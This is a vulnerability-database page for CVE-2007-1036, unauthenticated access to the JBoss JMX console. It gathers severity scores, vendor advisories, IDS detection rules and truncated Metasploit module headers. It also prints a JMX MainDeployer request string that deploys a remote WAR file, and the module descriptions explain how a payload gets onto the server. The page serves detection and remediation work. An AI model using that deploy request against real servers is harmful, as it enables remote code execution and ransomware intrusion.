CVE-2007-1036
published 2007-02-21CVE-2007-1036: The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass…
PriorityP187high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEVRansomware
Exploited in the wild
EPSS
81.83%
99.6th percentile
The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass authentication and gain administrative access via direct requests.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | procurve_manager | — | — |
| hp | procurve_manager | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandaction=invokeOpByName&name=jboss.system:service=MainDeployer&methodName=deploy&argType=java.lang.String&arg0=<WAR_URL>↗
otherContent-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation↗
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/invoker/JMXInvokerServlet/"; nocase; reference:cve,2007-1036; reference:url,exploit-db.com/exploits/21080/; classtype:web-application-attack; sid:2015747; rev:4; metadata:created_at 2012_09_28, cve CVE_2007_1036, confidence Medium, signature_severity Major, updated_at 2020_04_22;)
- →Detect unauthenticated POST requests to /jmx-console/HtmlAdaptor with 'invokeOpByName' and 'MainDeployer' parameters, indicating WAR deployment via JMX Console. ↗
- →Detect POST requests to /invoker/JMXInvokerServlet with Content-Type 'application/x-java-serialized-object' — indicates JMXInvokerServlet abuse for unauthenticated WAR deployment. ↗
- →Monitor for HTTP requests to /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo — used by attackers for automated platform fingerprinting prior to exploitation. ↗
- →Alert on HTTP verbs other than GET or POST (e.g., HEAD) targeting /jmx-console/HtmlAdaptor, as the exploit supports non-standard verbs to bypass authentication filters (CVE-2010-0738 chaining). ↗
- →Check for JBoss version strings 'CVSTag=Branch_4_', 'SVNTag=JBoss_4_', or 'SVNTag=JBoss_5_' in HTTP responses to /invoker/JMXInvokerServlet — these indicate vulnerable JBoss 4.x/5.x targets. ↗
- ·The exploit only works if the target JBoss server can make outbound HTTP connections back to the attacker (for WAR retrieval via MainDeployer). Egress filtering will block this attack vector. ↗
- ·The DeploymentFileRepository-based attack path (via JMXInvokerServlet) is only applicable to JBoss 4.x and 5.x. ↗
- ·The vulnerability stems from default JBoss configuration leaving the console and web management interfaces unauthenticated; securing these interfaces per the JBoss Application Server Guide mitigates the risk. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mm58-72w4-25hp: HP ProCurve Manager (PCM) 3
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2013-4810 [HIGH] CWE-94 GHSA-mm58-72w4-25hp: HP ProCurve Manager (PCM) 3
HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, Identity Driven Manager (IDM) 4.0, and Application Lifecycle Management allow remote attackers to execute arbitrary code via a marshalled object to (1) EJBInvokerServlet or (2) JMXInvokerServlet, aka ZDI-CAN-1760. NOTE: this is probably a duplicate of CVE-2007-1036, CVE-2010-0738, and/or CVE-2012-0874.
GHSA
GHSA-jchw-rw3j-3rjm: The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to byp
ghsa_unreviewed·2022-05-01
CVE-2007-1036 [HIGH] GHSA-jchw-rw3j-3rjm: The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to byp
The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass authentication and gain administrative access via direct requests.
VulnCheck
JBoss Direct Request Security Bypass
vulncheck·2007·CVSS 7.5
CVE-2007-1036 [HIGH] JBoss Direct Request Security Bypass
JBoss Direct Request Security Bypass
The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass authentication and gain administrative access via direct requests.
Affected: jboss JBoss
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://web.archive.org/web/20220227045141/https://risksense.com/wp-content/uploads/2019/09/RiskSense-Spotlight-Report-Ransomware.pdf; https://know.netenrich.com/blog/muhstik-do-you-know-this-botnet/; https://cybersecurityworks.com/pdf/ransomware/Spotlight_Ransomware2021.pdf; https://cybersecurit
Red Hat
CVE-2007-1036: The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to byp
vendor_redhat·CVSS 7.5
CVE-2007-1036 [HIGH] CVE-2007-1036: The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to byp
The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass authentication and gain administrative access via direct requests.
Statement: The JBoss AS console manager should always be secured prior to deployment, as directed in the JBoss Application Server Guide and release notes. By default, the JBoss AS installer gives users the ability to password protect the console manager. If the user did not use the installer, the raw JBoss services will be in a completely unconfigured state and these steps should be performed manually:
http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss
Red Hat
CVE-2007-2452: Heap-based buffer overflow in the visit_old_format function in locate/locate
vendor_redhat·CVSS 7.2
CVE-2007-2452 [HIGH] CVE-2007-2452: Heap-based buffer overflow in the visit_old_format function in locate/locate
Heap-based buffer overflow in the visit_old_format function in locate/locate.c in locate in GNU findutils before 4.2.31 might allow context-dependent attackers to execute arbitrary code via a long pathname in a locate database that has the old format, a different vulnerability than CVE-2001-1036.
Statement: Not vulnerable. Red Hat did not ship GNU locate in Red Hat Enterprise Linux 2.1, 3, 4, or 5. This issue does not affect the mlocate or slocate packages that are supplied with Red Hat Enterprise Linux.
Suricata
ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt
suricata·2012-09-28
CVE-2007-1036 ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt
ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/invoker/JMXInvokerServlet/"; nocase; reference:cve,2007-1036; reference:url,exploit-db.com/exploits/21080/; classtype:web-application-attack; sid:2015747; rev:4; metadata:created_at 2012_09_28, cve CVE_2007_1036, confidence Medium, signature_severity Major, updated_at 2020_04_22;)
Exploit-DB
JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) (Metasploit)
exploitdb·2012-09-05
CVE-2007-1036 JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) (Metasploit)
JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) (Metasploit)
---
require 'msf/core'
class Metasploit4 [ /JBoss/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)',
'Description' => %q{
This module can be used to execute a payload on JBoss servers that have an
exposed HTTPAdaptor's JMX Invoker exposed on the "JMXInvokerServlet". By invoking
the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed
to finally upload the selected payload to the target. The DeploymentFileRepository
methods are only available on Jboss 4.x and 5.x.
},
'Author' => [
'Patrick Hof', # Vulnerability discovery, ana
Exploit-DB
JBoss JMX - Console Deployer Upload and Execute (Metasploit)
exploitdb·2010-10-19
CVE-2007-1036 JBoss JMX - Console Deployer Upload and Execute (Metasploit)
JBoss JMX - Console Deployer Upload and Execute (Metasploit)
---
##
# $Id: jboss_maindeployer.rb 10754 2010-10-19 22:24:33Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 [ /(Jetty|JBoss)/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss JMX Console Deployer Upload and Execute',
'Description' => %q{
This module can be used to execute a payload on JBoss servers that have
an exposed "jmx-console" applicat
Metasploit
JBoss JMX Console Deployer Upload and Execute
metasploit
JBoss JMX Console Deployer Upload and Execute
JBoss JMX Console Deployer Upload and Execute
This module can be used to execute a payload on JBoss servers that have an exposed "jmx-console" application. The payload is put on the server by using the jboss.system:MainDeployer functionality. To accomplish this, a temporary HTTP server is created to serve a WAR archive containing our payload. This method will only work if the target server allows outbound connections to us.
Metasploit
JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)
metasploit
JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)
JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)
This module can be used to execute a payload on JBoss servers that have an exposed HTTPAdaptor's JMX Invoker exposed on the "JMXInvokerServlet". By invoking the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed to finally upload the selected payload to the target. The DeploymentFileRepository methods are only available on Jboss 4.x and 5.x.
http://osvdb.org/33744http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBosshttp://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxConsolehttp://www.kb.cert.org/vuls/id/632656http://www.securityfocus.com/archive/1/460597/100/0/threadedhttp://www.securityfocus.com/archive/1/460605/100/0/threadedhttp://www.securityfocus.com/archive/1/460695/100/0/threadedhttp://www.securitytracker.com/id?1017677https://exchange.xforce.ibmcloud.com/vulnerabilities/32596http://osvdb.org/33744http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBosshttp://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxConsolehttp://www.kb.cert.org/vuls/id/632656http://www.securityfocus.com/archive/1/460597/100/0/threadedhttp://www.securityfocus.com/archive/1/460605/100/0/threadedhttp://www.securityfocus.com/archive/1/460695/100/0/threadedhttp://www.securitytracker.com/id?1017677https://exchange.xforce.ibmcloud.com/vulnerabilities/32596
2007-02-21
Published
Exploited in the wild